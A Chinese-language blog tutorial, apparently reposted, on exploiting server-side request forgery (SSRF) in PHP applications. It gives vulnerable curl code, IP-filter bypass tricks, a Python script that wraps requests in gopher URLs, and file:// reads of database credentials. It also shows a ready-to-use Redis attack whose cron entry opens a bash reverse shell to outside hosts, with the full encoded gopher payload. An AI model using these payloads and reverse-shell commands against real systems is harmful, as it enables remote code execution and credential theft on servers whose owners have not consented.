大家好,又见面了,我是你们的朋友全栈君。
0x00 什么是SSRF?
SSRF(Server-Side Request Forgery):指目标应用存在一种漏洞,利用该漏洞攻击者可以控制目标web应用的后端程序向任意ip地址/语言发送http请求或者其他数据包
对外发起网络请求的地方都可能存在SSRF漏洞
0x01 危害和利用:
1. 可以对外网服务器所在内网进行端口扫描
2. 攻击运行在内网或本地的应用程序(比如溢出)
3. 对内网Web应用比如cms进行指纹识别,通过访问cms的一些特有默认文件实现
4. 攻击内外网的Web应用,主要是使用Get参数就可以实现的攻击(比如 Struts2漏洞利用,SQL注入等)
5. 利用File协议读取本地文件
例如:
以下后端脚本就存在ssrf漏洞,攻击者可以控制脚本向任意地址发送数据(curl不仅仅能发送http请求还支持其他协议)
<?php
$url = $_GET['url'];
$hCurl = curl_init();
curl_setopt($hCurl,CURLOPT_URL,$url);
curl_setopt($hCurl,CURLOPT_HEADER,false);
curl_setopt($hCurl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($hCurl,CURLOPT_SSL_VERIFYPEER,false);
curl_setopt($hCurl,CURLOPT_FOLLOWLOCATION,true);
$ret = curl_exec($hCurl);
curl_close($hCurl);
echo $ret;
?>通过这index.php,攻击者可以如何利用呢?
1.隐藏身份,请求外网地址
例如:index.php?url=www.baidu.com
2.探测和攻击内网中其他服务器
比如说对内网的机器进行扫描。因为php的curl不仅支持http协议,还支持其他协议,通过其他协议可以对内网进行扫描
例如:
还可以:
index.php?url=dict://192.168.2.101:80 利用自动化脚本遍历内网的ip地址,探测内网中80端口开放的机器。
index.php?url=dict://127.0.0.1:3306
来探测mysql数据库的相关版本信息(其实发送get请求也可以)
index.php?url=dict://127.0.0.1:3306
通过文件传输协议file://来请求文件内容,可以用来爬源码,爬数据库conf文件(存了数据库账号密码等的文件,这样我们就能尝试在从外部连接他的数据库)等
index.php?url=file://Applications/MAMP/htdocs/pentest/ssrf/1.txt
0x01 如何判断ssrf漏洞的存在
关键在于:判定目标网站的后端程序 是否可以被控制用于向外界发送请求
判断方法:
- 是否有回显
- 延时
- dns请求:利用我们手中的域名和dns服务器,让目标站点尝试向该域名发送请求,如果能发送请求,必然会先进行dns查询,将域名转化为ip,那么我们的dns服务器上就可以收到该dns查询请求。(可以利用ceye.io)
- 同样的思路:我们自己的主机上开放一个tcp端口(可以直接利用nc或者自己写一个服务端程序)让目标主机尝试向我们自己的主机发送请求,如果我们的tcp端口收到了连接请求,那么就证明目标主机存在ssrf漏洞。
0x02 PHP相关函数总结
1.file_get_contents()
例题:
将http响应报文写入图片存储起来
例如:有些网站的图片上传功能支持直接填写图片的url地址,那么从程序员的角度上可以猜测这种功能有两种实现方式:
第一种,直接将url入库,然后前端图片的src设置成该url即可
第二种,对url发送http请求,将图片下载下来,保存在服务器本地或者类似七牛云的对象存储空间中
显然第二种情况就存在ssrf漏洞,并且是“有回显的ssrf”
2.fsockopen()
创建一个tcp或者udp套接字,并向目标主机发送连接请求
可以用来实现发送http get请求/post请求等,因为tcp或者udp套接字,所以应用层协议的报头需要自己写。
使用案例:https://blog.csdn.net/zjsfdx/article/details/89376176
3.curl_exec()
最常用的是用来发送http请求(get请求,post请求等)
除此之外还支持其他应用层协议,比如常用的dict、file、ftp、sftp、gopher、telnet
curl支持的所有应用层协议:
0x04 IP限制绕过
如果ssrf漏洞限定了输入不能为ip地址的话,可以用以下方式绕过正则匹配:
1.ip地址之后加端口
2.ip地址前添加用户名 例如 http://root@127.0.0.1
3.ip地址之后添加get传参
4.短网址:使用短网址平台将url转化为短网址(短网址平台实现原理其实非常简单,就是在它的域名下提供一个路由,当你访问这个路由的时候就会向你提供的url发送get请求或者直接跳转到你提供的url)
如果curl没有开启跟随跳转选项的话,这种短网址跳转的方式就会得不到回显
5.使用子域名解析:xip.io
也就说“ip地址.xip.io” 这个域名会被 dns服务器解析为“ip地址”
将ip地址转化为其他进制:
比如说:目标主机限制了ip地址不能为127.0.0.1,那么就可以将:
127.0.0.1 -> 8进制 0177.0.0.1->16进制 0x7f.0.0.1
因为常见的ip地址为了人类友好都是点分十进制的表示方法,但是本质上在计算机中ip地址实际存储形式不过是用4个字节的内存去存4个8位的二进制,也就是4个两位的16进制
127.0.0.1 ->0x7f 00 00 01 浏览器访问:http://0x7f000001 仍然是可行的
将http://0x7f000001 转化为十进制也是可行的 http://2130706433
也就说点分十进制的表示方式 和十进制的表示都可行的
点分十进制是将32位的ip地址 8位8位的转化为10进制,所以需要点来分割
十进制是将32位的ip地址32位全部转化为10进制,所以不需要点来分割
0x05 gopher协议
gopher是一个互联网上使用的分布型的文件搜集获取网络协议
gopher协议的格式:gopher://host:port/_+数据流
- 如果不指定端口,默认端口为70端口
- 数据流要求全部进行url编码,并且以\r\n换行也就说以%0D%0A换行
gopher协议支持发出GET、POST请求:
可以先截获 get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议 (俗称万能协议)。
转化思路:
将get请求报文/post请求报文先进行url编码,然后将%0A 全部替换为%0D%0A即可
比如说:
该页面存在一个ssrf漏洞:
<?php
$url = $_GET['url'];
$hCurl = curl_init();
echo "接收到的url为:\n";
echo $url."\n";
curl_setopt($hCurl,CURLOPT_URL,$url);
curl_setopt($hCurl,CURLOPT_HEADER,false);
curl_setopt($hCurl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($hCurl,CURLOPT_FOLLOWLOCATION,true);
$ret = curl_exec($hCurl);
curl_close($hCurl);
echo $ret;
?>利用脚本:
import urllib.parse
import requests
def createGopher(host, port, http_header):
"""将http应用层协议包装成gopher协议"""
http_header = urllib.parse.quote(http_header) # 对报文进行url编码
http_header = http_header.replace('%0A', '%0D%0A') # 将所有\n 替换为\r\n
gopher = "gopher://%s:%d/_%s" % (host, port, http_header)
# print("gopher协议:",gopher)
return gopher
def get_demo():
http_header = """GET / HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
"""
host = "127.0.0.1"
port = 8888
gopher = createGopher(host, port, http_header)
return gopher
def post_demo():
http_header = """POST /loophole-recurrence/SSRF/post.php HTTP/1.1
Host: localhost:8888
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
username=123&passwd=123123
"""
host = "localhost"
port = 8888
gopher = createGopher(host, port, http_header)
return gopher
def main():
gopher = get_demo()
# gopher = post_demo()
# 因为存在ssrf漏洞的php脚本在收到请求后,会对url进行url解码,所以这里需要再编码一次,确保php的curl发送的url编码格式的gopher协议
gopher = urllib.parse.quote(gopher)
base_url = "http://localhost:8888/loophole-recurrence/SSRF/"
target_url = base_url+"curl.php?url="+gopher
resp = requests.get(target_url)
print(resp.text)
if __name__ == '__main__':
main()
gopher对redis的利用:
redis没有密码
思路:
利用ssrf漏洞,通过gopher协议向redis发送一个请求,让redis将数据库文件保存到linux定时任务文件夹下,从而写入一个定时任务
redis-cli -h $1 -p $2 set 1 "\n\n*/1 * * * * bash -i >& /dev/tcp/106.12.37.37/2333 0>&1\n\n"
redis-cli -h $1 -p $2 config set dir /var/spool/cron/
redis-cli -h $1 -p $2 config set dbfilename root
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit/var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名
分、时、日、月、周 命令
*/1 * * * */bin/bash -i >& /dev/tcp/192.168.0.105/4444 0>&1
0 是标准输入的文件描述符
1 是标准输出的文件描述符
0>&1 表示将标准输入重定向到文件描述符为1的文件中,即将标准输入重定向到标准输出
/dev/tcp/xxxx/xxx 是一个特殊的文件,凡是尝试对该文件读或者写的操作,都会导致该文件发起一个socket连接
/bin/bash >& 表示将/bin/bash 的标准输出 写入到 /dev/tcp/xxxx
/dev/tcp/ip地址/端口 相当于创建了一个tcp套接字去连接IP地址:端口
这是一个反向的木马架构
正向的木马是标准的cs架构,把server放在目标主机上,打开端口。攻击者用client去连这个端口
反向的木马架构是将cs架构倒过来,把server放在自己主机上,打开端口,让目标主机用client去连
比如说:我在ip地址为192.168.0.105的主机上nc -l -p 4444 开启了一个服务端
然后我让目标主机:/bin/bash -i >& /dev/tcp/192.168.0.105/4444 0>&1
config set dir 设置数据库文件存储的位置
config set dbfilename root 设置数据库文件名为root
save 强制redis将当前数据库中的数据同步到数据库文件中
如何使用gopher协议来模拟redis-cilent 的以上操作呢?
我们需要将redis-client 发送给redis-server的报文截获下来,修改为gopher协议的格式
如何截获呢?可以使用以中间人代理,让redis-client发送报文给中间人,中间人转发给redis-server
shell.sh
redis-cli -h $1 -p $2 set 1 "\n\n*/1 * * * * bash -i >& /dev/tcp/106.12.37.37/2333 0>&1\n\n"
redis-cli -h $1 -p $2 config set dir /var/spool/cron/
redis-cli -h $1 -p $2 config set dbfilename root
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit比如说中间人端口为4444,启动中间人代理
socat -v tcp-listen:4444,fork tcp-connect:localhost:6379
向中间人发送数据包,./shell.sh 127.0.0.1 4444
拦截到的报文格式:
格式转化脚本:
curl -v ‘gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$58%0d%0a%0a %0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d% 0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0 aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0 d%0a*1%0d%0a$4%0d%0aquit%0d%0a’
需要注意的是,如果要换IP和端口,前面的$58也需要更改,$58表示字符串长度 为58个字节,上面的EXP即是%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a,3+51+4=58。如果想换成 42.256.24.73,那么$58需要改成$61,以此类推就行。
gopher对mysql的利用
背景:存在ssrf 、mysql 无密码
因为有密码时,需要计算服务器生成的挑战数:
MySQL数据库用户认证采用的是挑战/应答的方式,服务器生成该挑战数(scramble)并发送给客户端,客户端用挑战数加密密码后返回相应结果,然后服务器检查是否与预期的结果相同,从而完成用户认证的过程。
(1)对mysql 客户端和mysql服务端之间的交互报文进行抓包
mysql -h localhost -uroot -p
设置-h为本地回环,这样报文就会走Loopback对应的网卡接口
只要复制报文的16进制代码,转化为gopher格式直接发过去就行了
协议转化:
gopher://127.0.0.1:3306/_ +url编码的登录请求
+包长度
+%00%00%00%03
+查询语句(url编码)
+%01%00%00%00%01
工具推荐
https://github.com/tarunkant/Gopherus
0x0 案例
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0215779
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/152841.html原文链接:https://javaforall.net
